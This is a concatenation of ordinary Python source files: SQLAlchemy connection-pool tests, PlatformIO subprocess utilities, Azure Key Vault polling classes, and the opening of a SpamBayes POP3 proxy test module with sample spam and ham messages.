def creator():
return dbapi.connect()
p = pool.QueuePool(creator=creator, pool_size=1, max_overflow=0)
conn = p.connect()
conn.close()
_existing_checkout = pool._ConnectionRecord.checkout
@classmethod
def _decorate_existing_checkout(cls, *arg, **kw):
fairy = _existing_checkout(*arg, **kw)
connrec = fairy._connection_record
connrec.invalidate()
return fairy
with patch(
"sqlalchemy.pool._ConnectionRecord.checkout",
_decorate_existing_checkout):
conn = p.connect()
is_(conn._connection_record.connection, None)
conn.close()
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator():
canary.append(1)
return dbapi.connect()
p1 = pool.QueuePool(
creator=creator,
pool_size=1, timeout=None,
max_overflow=0)
def waiter(p):
conn = p.connect()
canary.append(2)
time.sleep(.5)
conn.close()
c1 = p1.connect()
threads = []
for i in range(5):
t = threading.Thread(target=waiter, args=(p1, ))
t.start()
threads.append(t)
time.sleep(.5)
eq_(canary, [1])
# this also calls invalidate()
# on c1
p1._invalidate(c1)
for t in threads:
t.join(join_timeout)
eq_(canary, [1, 1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(creator=dbapi.connect,
pool_size=2, timeout=None,
max_overflow=0)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.connection
c2_con = c2.connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is c2_con
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_mixed_close(self):
pool._refs.clear()
p = self._queuepool_fixture(pool_size=3, max_overflow=-1,
use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = None
assert p.checkedout() == 1
c1 = None
lazy_gc()
assert p.checkedout() == 0
lazy_gc()
assert not pool._refs
def test_overflow_no_gc_tlocal(self):
self._test_overflow_no_gc(True)
def test_overflow_no_gc(self):
self._test_overflow_no_gc(False)
def _test_overflow_no_gc(self, threadlocal):
p = self._queuepool_fixture(
pool_size=2,
max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
eq_(
set([c.close.call_count for c in strong_refs]),
set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0])
)
@testing.requires.predictable_gc
def test_weakref_kaboom(self):
p = self._queuepool_fixture(
pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2 = None
del c1
del c2
gc_collect()
assert p.checkedout() == 0
c3 = p.connect()
assert c3 is not None
def test_trick_the_counter(self):
"""this is a "flaw" in the connection pool; since threadlocal
uses a single ConnectionFairy per thread with an open/close
counter, you can fool the counter into giving you a
ConnectionFairy with an ambiguous counter, i.e. it's not true
reference counting."""
p = self._queuepool_fixture(
pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = p.connect()
c2.close()
self.assert_(p.checkedout() != 0)
c2.close()
self.assert_(p.checkedout() == 0)
def test_recycle(self):
with patch("sqlalchemy.pool.time.time") as mock:
mock.return_value = 10000
p = self._queuepool_fixture(
pool_size=1,
max_overflow=0,
recycle=30)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
mock.return_value = 10001
c2 = p.connect()
is_(c2.connection, c_ref())
c2.close()
mock.return_value = 10035
c3 = p.connect()
is_not_(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_invalidate(self):
p = self._queuepool_fixture(
pool_size=1,
max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
p._invalidate(c2)
assert c2_rec.connection is None
c2.close()
time.sleep(.5)
c3 = p.connect()
is_not_(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_soft_invalidate(self):
p = self._queuepool_fixture(
pool_size=1,
max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
c2.invalidate(soft=True)
is_(c2_rec.connection, c2.connection)
c2.close()
time.sleep(.5)
c3 = p.connect()
is_not_(c3.connection, c_ref())
is_(c3._connection_record, c2_rec)
is_(c2_rec.connection, c3.connection)
def _no_wr_finalize(self):
finalize_fairy = pool._finalize_fairy
def assert_no_wr_callback(
connection, connection_record,
pool, ref, echo, fairy=None):
if fairy is None:
raise AssertionError(
"finalize fairy was called as a weakref callback")
return finalize_fairy(
connection, connection_record, pool, ref, echo, fairy)
return patch.object(
pool, '_finalize_fairy', assert_no_wr_callback)
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
# p is QueuePool with size=1, max_overflow=2,
# and one connection in the pool that will need to
# reconnect when next used (either due to recycle or invalidate)
with self._no_wr_finalize():
eq_(p.checkedout(), 0)
eq_(p._overflow, 0)
dbapi.shutdown(True)
assert_raises(
Exception,
p.connect
)
eq_(p._overflow, 0)
eq_(p.checkedout(), 0) # and not 1
dbapi.shutdown(False)
c1 = self._with_teardown(p.connect()) # noqa
assert p._pool.empty() # poolsize is one, so we're empty OK
c2 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1) # and not 2
# this hangs if p._overflow is 2
c3 = self._with_teardown(p.connect())
c3.close()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.invalidate()
c1.close()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_error_on_pooled_reconnect_cleanup_recycle(self):
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=1,
max_overflow=2, recycle=1)
c1 = p.connect()
c1.close()
time.sleep(1.5)
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
def test_connect_handler_not_called_for_recycled(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=2, max_overflow=2)
canary = Mock()
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
event.listen(p, "connect", canary.connect)
event.listen(p, "checkout", canary.checkout)
assert_raises(
Exception,
p.connect
)
p._pool.queue = collections.deque(
[
c for c in p._pool.queue
if c.connection is not None
]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
eq_(
canary.mock_calls,
[
call.connect(ANY, ANY),
call.checkout(ANY, ANY, ANY)
]
)
def test_connect_checkout_handler_always_gets_info(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=2, max_overflow=2)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
@event.listens_for(p, "connect")
def connect(conn, conn_rec):
conn_rec.info['x'] = True
@event.listens_for(p, "checkout")
def checkout(conn, conn_rec, conn_f):
assert 'x' in conn_rec.info
assert_raises(
Exception,
p.connect
)
p._pool.queue = collections.deque(
[
c for c in p._pool.queue
if c.connection is not None
]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
def test_error_on_pooled_reconnect_cleanup_wcheckout_event(self):
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=1,
max_overflow=2)
c1 = p.connect()
c1.close()
@event.listens_for(p, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if dbapi.is_shutdown:
raise tsa.exc.DisconnectionError()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_recycle_pool_no_race(self):
def slow_close():
slow_closing_connection._slow_close()
time.sleep(.5)
slow_closing_connection = Mock()
slow_closing_connection.connect.return_value.close = slow_close
class Error(Exception):
pass
dialect = Mock()
dialect.is_disconnect = lambda *arg, **kw: True
dialect.dbapi.Error = Error
pools = []
class TrackQueuePool(pool.QueuePool):
def __init__(self, *arg, **kw):
pools.append(self)
super(TrackQueuePool, self).__init__(*arg, **kw)
def creator():
return slow_closing_connection.connect()
p1 = TrackQueuePool(creator=creator, pool_size=20)
from sqlalchemy import create_engine
eng = create_engine(testing.db.url, pool=p1, _initialize=False)
eng.dialect = dialect
# 15 total connections
conns = [eng.connect() for i in range(15)]
# return 8 back to the pool
for conn in conns[3:10]:
conn.close()
def attempt(conn):
time.sleep(random.random())
try:
conn._handle_dbapi_exception(
Error(), "statement", {},
Mock(), Mock())
except tsa.exc.DBAPIError:
pass
# run an error + invalidate operation on the remaining 7 open
# connections
threads = []
for conn in conns:
t = threading.Thread(target=attempt, args=(conn, ))
t.start()
threads.append(t)
for t in threads:
t.join()
# return all 15 connections to the pool
for conn in conns:
conn.close()
# re-open 15 total connections
conns = [eng.connect() for i in range(15)]
# 15 connections have been fully closed due to invalidate
assert slow_closing_connection._slow_close.call_count == 15
# 15 initial connections + 15 reconnections
assert slow_closing_connection.connect.call_count == 30
assert len(pools) <= 2, len(pools)
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(reset_on_return=None, pool_size=1,
max_overflow=0)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._use_threadlocal is False
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c2 = p.connect() # noqa
eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
c1_con = c1.connection
assert c1_con is not None
eq_(c1_con.close.call_count, 0)
c1.close()
eq_(c1_con.close.call_count, 1)
def test_detach_via_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1_con = c1.connection
c1.invalidate()
assert c1.connection is None
eq_(c1_con.close.call_count, 1)
c2 = p.connect()
assert c2.connection is not c1_con
c2_con = c2.connection
c2.close()
eq_(c2_con.close.call_count, 0)
def test_threadfairy(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1,
use_threadlocal=True)
c1 = p.connect()
c1.close()
c2 = p.connect()
assert c2.connection is not None
class ResetOnReturnTest(PoolTestBase):
def _fixture(self, **kw):
dbapi = Mock()
return dbapi, pool.QueuePool(
creator=lambda: dbapi.connect('foo.db'),
**kw)
def test_plain_rollback(self):
dbapi, p = self._fixture(reset_on_return='rollback')
c1 = p.connect()
c1.close()
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_plain_commit(self):
dbapi, p = self._fixture(reset_on_return='commit')
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_plain_none(self):
dbapi, p = self._fixture(reset_on_return=None)
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_agent_rollback(self):
dbapi, p = self._fixture(reset_on_return='rollback')
class Agent(object):
def __init__(self, conn):
self.conn = conn
def rollback(self):
self.conn.special_rollback()
def commit(self):
self.conn.special_commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
assert dbapi.connect().special_rollback.called
assert not dbapi.connect().special_commit.called
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
c1 = p.connect()
c1.close()
eq_(dbapi.connect().special_rollback.call_count, 1)
eq_(dbapi.connect().special_commit.call_count, 0)
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_agent_commit(self):
dbapi, p = self._fixture(reset_on_return='commit')
class Agent(object):
def __init__(self, conn):
self.conn = conn
def rollback(self):
self.conn.special_rollback()
def commit(self):
self.conn.special_commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
assert not dbapi.connect().special_rollback.called
assert dbapi.connect().special_commit.called
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
c1 = p.connect()
c1.close()
eq_(dbapi.connect().special_rollback.call_count, 0)
eq_(dbapi.connect().special_commit.call_count, 1)
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
class SingletonThreadPoolTest(PoolTestBase):
@testing.requires.threading_with_mock
def test_cleanup(self):
self._test_cleanup(False)
@testing.requires.threading_with_mock
def test_cleanup_no_gc(self):
self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(.1)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(p._all_conns) == 3
if strong_refs:
still_opened = len([c for c in sr if not c.close.call_count])
eq_(still_opened, 3)
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c1.close()
c1 = None
c1 = p.connect()
c1.invalidate()
c1 = None
c1 = p.connect()
dbapi.connect.assert_has_calls(
[
call('foo.db'),
call('foo.db')],
any_order=True)
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect('foo.db')
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
class CreatorCompatibilityTest(PoolTestBase):
def test_creator_callable_outside_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator()
finally:
conn.close()
def test_creator_callable_outside_witharg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator(Mock())
finally:
conn.close()
def test_creator_patching_arg_to_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
# the creator is the two-arg form
conn = creator(Mock())
finally:
conn.close()
def mock_create():
return creator()
conn = e.connect()
conn.invalidate()
conn.close()
# test that the 'should_wrap_creator' status
# will dynamically switch if the _creator is monkeypatched.
# patch it with a zero-arg form
with patch.object(e.pool, "_creator", mock_create):
conn = e.connect()
conn.invalidate()
conn.close()
conn = e.connect()
conn.close()
|
proc.py
|
# Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import sys
from contextlib import contextmanager
from threading import Thread
from platformio import exception
from platformio.compat import (
IS_WINDOWS,
get_filesystem_encoding,
get_locale_encoding,
string_types,
)
class AsyncPipeBase(object):
def __init__(self):
self._fd_read, self._fd_write = os.pipe()
self._pipe_reader = os.fdopen(
self._fd_read, encoding="utf-8", errors="backslashreplace"
)
self._buffer = ""
self._thread = Thread(target=self.run)
self._thread.start()
def get_buffer(self):
return self._buffer
def fileno(self):
return self._fd_write
def run(self):
try:
self.do_reading()
except (KeyboardInterrupt, SystemExit, IOError):
self.close()
def do_reading(self):
raise NotImplementedError()
def close(self):
self._buffer = ""
os.close(self._fd_write)
self._thread.join()
class BuildAsyncPipe(AsyncPipeBase):
def __init__(self, line_callback, data_callback):
self.line_callback = line_callback
self.data_callback = data_callback
super(BuildAsyncPipe, self).__init__()
def do_reading(self):
line = ""
print_immediately = False
for char in iter(lambda: self._pipe_reader.read(1), ""):
self._buffer += char
if line and char.strip() and line[-3:] == (char * 3):
# a run of 4+ identical non-space chars (e.g. a progress bar) switches to char-by-char output
print_immediately = True
if print_immediately:
# leftover bytes
if line:
self.data_callback(line)
line = ""
self.data_callback(char)
if char == "\n":
print_immediately = False
else:
line += char
if char != "\n":
continue
self.line_callback(line)
line = ""
self._pipe_reader.close()
class LineBufferedAsyncPipe(AsyncPipeBase):
def __init__(self, line_callback):
self.line_callback = line_callback
super(LineBufferedAsyncPipe, self).__init__()
def do_reading(self):
for line in iter(self._pipe_reader.readline, ""):
self._buffer += line
self.line_callback(line)
self._pipe_reader.close()
def exec_command(*args, **kwargs):
result = {"out": None, "err": None, "returncode": None}
default = dict(stdout=subprocess.PIPE, stderr=subprocess.PIPE)
default.update(kwargs)
kwargs = default
with subprocess.Popen(*args, **kwargs) as p:
try:
result["out"], result["err"] = p.communicate()
result["returncode"] = p.returncode
except KeyboardInterrupt:
raise exception.AbortedByUser()
finally:
for s in ("stdout", "stderr"):
if isinstance(kwargs[s], AsyncPipeBase):
kwargs[s].close() # pylint: disable=no-member
for s in ("stdout", "stderr"):
if isinstance(kwargs[s], AsyncPipeBase):
result[s[3:]] = kwargs[s].get_buffer() # pylint: disable=no-member
for key, value in result.items():
if isinstance(value, bytes):
try:
result[key] = value.decode(
get_locale_encoding() or get_filesystem_encoding()
)
except UnicodeDecodeError:
result[key] = value.decode("latin-1")
if value and isinstance(value, string_types):
result[key] = value.strip()
return result
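# A minimal usage sketch for exec_command() (the command shown is only an
# example; where_is_program() below calls it the same way):
#
#     result = exec_command(["python", "--version"])
#     if result["returncode"] == 0:
#         print(result["out"])   # decoded and stripped stdout
#     else:
#         print(result["err"])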
@contextmanager
def capture_std_streams(stdout, stderr=None):
_stdout = sys.stdout
_stderr = sys.stderr
sys.stdout = stdout
sys.stderr = stderr or stdout
yield
sys.stdout = _stdout
sys.stderr = _stderr
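# A small sketch of how capture_std_streams() can be used (io.StringIO is one
# possible file-like target; any object with a write() method works):
#
#     buf = io.StringIO()
#     with capture_std_streams(buf):
#         print("captured")
#     text = buf.getvalue()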
def is_ci():
return os.getenv("CI", "").lower() == "true"
def is_container():
if os.path.exists("/.dockerenv"):
return True
if not os.path.isfile("/proc/1/cgroup"):
return False
with open("/proc/1/cgroup", encoding="utf8") as fp:
return ":/docker/" in fp.read()
def get_pythonexe_path():
return os.environ.get("PYTHONEXEPATH", os.path.normpath(sys.executable))
def copy_pythonpath_to_osenv():
_PYTHONPATH = []
if "PYTHONPATH" in os.environ:
_PYTHONPATH = os.environ.get("PYTHONPATH").split(os.pathsep)
for p in os.sys.path:
conditions = [p not in _PYTHONPATH]
if not IS_WINDOWS:
conditions.append(
os.path.isdir(os.path.join(p, "click"))
or os.path.isdir(os.path.join(p, "platformio"))
)
if all(conditions):
_PYTHONPATH.append(p)
os.environ["PYTHONPATH"] = os.pathsep.join(_PYTHONPATH)
def where_is_program(program, envpath=None):
env = os.environ
if envpath:
env["PATH"] = envpath
# try OS's built-in commands
try:
result = exec_command(["where" if IS_WINDOWS else "which", program], env=env)
if result["returncode"] == 0 and os.path.isfile(result["out"].strip()):
return result["out"].strip()
except OSError:
pass
# look up in $PATH
for bin_dir in env.get("PATH", "").split(os.pathsep):
if os.path.isfile(os.path.join(bin_dir, program)):
return os.path.join(bin_dir, program)
if os.path.isfile(os.path.join(bin_dir, "%s.exe" % program)):
return os.path.join(bin_dir, "%s.exe" % program)
return program
def append_env_path(name, value):
cur_value = os.environ.get(name) or ""
if cur_value and value in cur_value.split(os.pathsep):
return cur_value
os.environ[name] = os.pathsep.join([cur_value, value])
return os.environ[name]
def force_exit(code=0):
os._exit(code) # pylint: disable=protected-access
|
_polling.py
|
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import logging
import time
import threading
import uuid
from typing import TYPE_CHECKING
from azure.core.polling import PollingMethod, LROPoller, NoPolling
from azure.core.exceptions import ResourceNotFoundError, HttpResponseError
try:
from urlparse import urlparse # type: ignore # pylint: disable=unused-import
except ImportError:
from urllib.parse import urlparse
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.common import with_current_context
if TYPE_CHECKING:
# pylint: disable=ungrouped-imports
from typing import Any, Callable, Union, List, Optional
logger = logging.getLogger(__name__)
class KeyVaultOperationPoller(LROPoller):
"""Poller for long running operations where calling result() doesn't wait for operation to complete.
"""
# pylint: disable=arguments-differ
def __init__(self, polling_method):
# type: (PollingMethod) -> None
super(KeyVaultOperationPoller, self).__init__(None, None, None, NoPolling())
self._polling_method = polling_method
# pylint: disable=arguments-differ
def result(self):
# type: () -> Any
"""Returns a representation of the final resource without waiting for the operation to complete.
:returns: The deserialized resource of the long running operation
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
return self._polling_method.resource()
@distributed_trace
def wait(self, timeout=None):
# type: (Optional[int]) -> None
"""Wait on the long running operation for a number of seconds.
You can check if this call has ended with timeout with the "done()" method.
:param int timeout: Period of time to wait for the long running
operation to complete (in seconds).
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
if not self._polling_method.finished():
self._done = threading.Event()
self._thread = threading.Thread(
target=with_current_context(self._start), name="KeyVaultOperationPoller({})".format(uuid.uuid4())
)
self._thread.daemon = True
self._thread.start()
if self._thread is None:
return
self._thread.join(timeout=timeout)
try:
# self._exception may be None here; raising None raises TypeError, which we ignore below
raise self._exception # type: ignore
except TypeError: # Was None
pass
class DeleteRecoverPollingMethod(PollingMethod):
"""Poller for deleting resources, and recovering deleted resources, in vaults with soft-delete enabled.
This works by polling for the existence of the deleted or recovered resource. When a resource is deleted, Key Vault
immediately removes it from its collection. However, the resource will not immediately appear in the deleted
collection. Key Vault will therefore respond 404 to GET requests for the deleted resource; when it responds 2xx,
the resource exists in the deleted collection i.e. its deletion is complete.
Similarly, while recovering a deleted resource, Key Vault will respond 404 to GET requests for the non-deleted
resource; when it responds 2xx, the resource exists in the non-deleted collection, i.e. its recovery is complete.
"""
def __init__(self, command, final_resource, finished, interval=2):
self._command = command
self._resource = final_resource
self._polling_interval = interval
self._finished = finished
def _update_status(self):
# type: () -> None
try:
self._command()
self._finished = True
except ResourceNotFoundError:
pass
except HttpResponseError as e:
# If we are polling on get_deleted_* and we don't have get permissions, we will get
# ResourceNotFoundError until the resource is recovered, at which point we'll get a 403.
if e.status_code == 403:
self._finished = True
else:
raise
def initialize(self, client, initial_response, deserialization_callback):
pass
def run(self):
# type: () -> None
try:
while not self.finished():
self._update_status()
if not self.finished():
time.sleep(self._polling_interval)
except Exception as e:
logger.warning(str(e))
raise
def finished(self):
# type: () -> bool
return self._finished
def resource(self):
# type: () -> Any
return self._resource
def status(self):
# type: () -> str
return "finished" if self._finished else "polling"
|
test_sb_server.py
|
#! /usr/bin/env python
"""Test the POP3 proxy is working correctly.
Given no command line options, carries out a test that the
POP3 proxy can be connected to, that incoming mail is classified,
that pipelining is removed from the CAPA[bility] query, and that the
web ui is present.
The -t option runs a fake POP3 server on port 8110. This is the
same server that the self-test uses, and it may be run separately for
other testing purposes.
Usage:
test_sb_server.py [options]
options:
-t : Runs a fake POP3 server on port 8110 (for testing).
-h : Displays this help message.
"""
# This module is part of the spambayes project, which is Copyright 2002-5
# The Python Software Foundation and is covered by the Python Software
# Foundation license.
__author__ = "Richie Hindle <richie@entrian.com>"
__credits__ = "All the Spambayes folk."
# This code originally formed a part of pop3proxy.py. If you are examining
# the history of this file, you may need to go back to there.
todo = """
Web training interface:
o Functional tests.
"""
# One example of spam and one of ham - both are used to train, and are
# then classified. Not a good test of the classifier, but a perfectly
# good test of the POP3 proxy. The bodies of these came from the
# spambayes project, and Richie added the headers because the
# originals had no headers.
spam1 = """From: friend@public.com
Subject: Make money fast
Hello tim_chandler , Want to save money ?
Now is a good time to consider refinancing. Rates are low so you can cut
your current payments and save money.
http://64.251.22.101/interest/index%38%30%300%2E%68t%6D
Take off list on site [s5]
"""
good1 = """From: chris@example.com
Subject: ZPT and DTML
Jean Jordaan wrote:
> 'Fraid so ;> It contains a vintage dtml-calendar tag.
> http://www.zope.org/Members/teyc/CalendarTag
>
> Hmm I think I see what you mean: one needn't manually pass on the
> namespace to a ZPT?
Yeah, Page Templates are a bit more clever, sadly, DTML methods aren't :-(
Chris
"""
# An example of a particularly nasty malformed message - where there is
# no body, and no separator, which would at one point slip through
# SpamBayes. This is an example that Tony made up.
malformed1 = """From: ta-meyer@ihug.co.nz
Subject: No body, and no separator"""
import asyncore
import socket
import operator
import re
import time
import getopt
import sys, os
import sb_test_support
sb_test_support.fix_sys_path()
from spambayes import Dibbler
from spambayes import tokenizer
from spambayes.UserInterface import UserInterfaceServer
from spambayes.ProxyUI import ProxyUserInterface
from sb_server import BayesProxyListener
from sb_server import state, _recreateState
from spambayes.Options import options
# HEADER_EXAMPLE is the longest possible header - the length of this one
# is added to the size of each message.
HEADER_EXAMPLE = '%s: xxxxxxxxxxxxxxxxxxxx\r\n' % \
options["Headers", "classification_header_name"]
# Our simulated slow POP3 server transmits about 100 characters per second.
PER_CHAR_DELAY = 0.01
class Listener(Dibbler.Listener):
"""Listener for TestPOP3Server. Works on port 8110, to co-exist
with real POP3 servers."""
def __init__(self, socketMap=asyncore.socket_map):
Dibbler.Listener.__init__(self, 8110, TestPOP3Server,
(socketMap,), socketMap=socketMap)
class TestPOP3Server(Dibbler.BrighterAsyncChat):
"""Minimal POP3 server, for testing purposes. Doesn't support
UIDL. USER, PASS, APOP, DELE and RSET simply return "+OK"
without doing anything. Also understands the 'KILL' command, to
kill it, and a 'SLOW' command, to change to really slow retrieval.
The mail content is the example messages above.
"""
def __init__(self, clientSocket, socketMap):
# Grumble: asynchat.__init__ doesn't take a 'map' argument,
# hence the two-stage construction.
Dibbler.BrighterAsyncChat.__init__(self, map=socketMap)
Dibbler.BrighterAsyncChat.set_socket(self, clientSocket, socketMap)
self.maildrop = [spam1, good1, malformed1]
self.set_terminator('\r\n')
self.okCommands = ['USER', 'PASS', 'APOP', 'NOOP', 'SLOW',
'DELE', 'RSET', 'QUIT', 'KILL']
self.handlers = {'CAPA': self.onCapa,
'STAT': self.onStat,
'LIST': self.onList,
'RETR': self.onRetr,
'TOP': self.onTop}
self.push("+OK ready\r\n")
self.request = ''
self.push_delay = 0.0 # 0.02 is a useful value for testing.
def collect_incoming_data(self, data):
"""Asynchat override."""
self.request = self.request + data
def found_terminator(self):
"""Asynchat override."""
if ' ' in self.request:
command, args = self.request.split(None, 1)
else:
command, args = self.request, ''
command = command.upper()
if command in self.okCommands:
self.push("+OK (we hope)\r\n")
if command == 'QUIT':
self.close_when_done()
elif command == 'KILL':
self.socket.shutdown(2)
self.close()
raise SystemExit
elif command == 'SLOW':
self.push_delay = PER_CHAR_DELAY
else:
handler = self.handlers.get(command, self.onUnknown)
self.push_slowly(handler(command, args))
self.request = ''
def push_slowly(self, response):
"""Sometimes we push out the response slowly to try and generate
timeouts. If the delay is 0, this just does a regular push."""
if self.push_delay:
for c in response.split('\n'):
if c and c[-1] == '\r':
self.push(c + '\n')
else:
# We want to trigger onServerLine, so need the '\r',
# so modify the message just a wee bit.
self.push(c + '\r\n')
time.sleep(self.push_delay * len(c))
else:
self.push(response)
def onCapa(self, command, args):
"""POP3 CAPA command. This lies about supporting pipelining for
test purposes - the POP3 proxy *doesn't* support pipelining, and
we test that it correctly filters out that capability from the
proxied capability list. Ditto for STLS."""
lines = ["+OK Capability list follows",
"PIPELINING",
"STLS",
"TOP",
".",
""]
return '\r\n'.join(lines)
def onStat(self, command, args):
"""POP3 STAT command."""
maildropSize = reduce(operator.add, map(len, self.maildrop))
maildropSize += len(self.maildrop) * len(HEADER_EXAMPLE)
return "+OK %d %d\r\n" % (len(self.maildrop), maildropSize)
def onList(self, command, args):
"""POP3 LIST command, with optional message number argument."""
if args:
try:
number = int(args)
except ValueError:
number = -1
if 0 < number <= len(self.maildrop):
return "+OK %d\r\n" % len(self.maildrop[number-1])
else:
return "-ERR no such message\r\n"
else:
returnLines = ["+OK"]
for messageIndex in range(len(self.maildrop)):
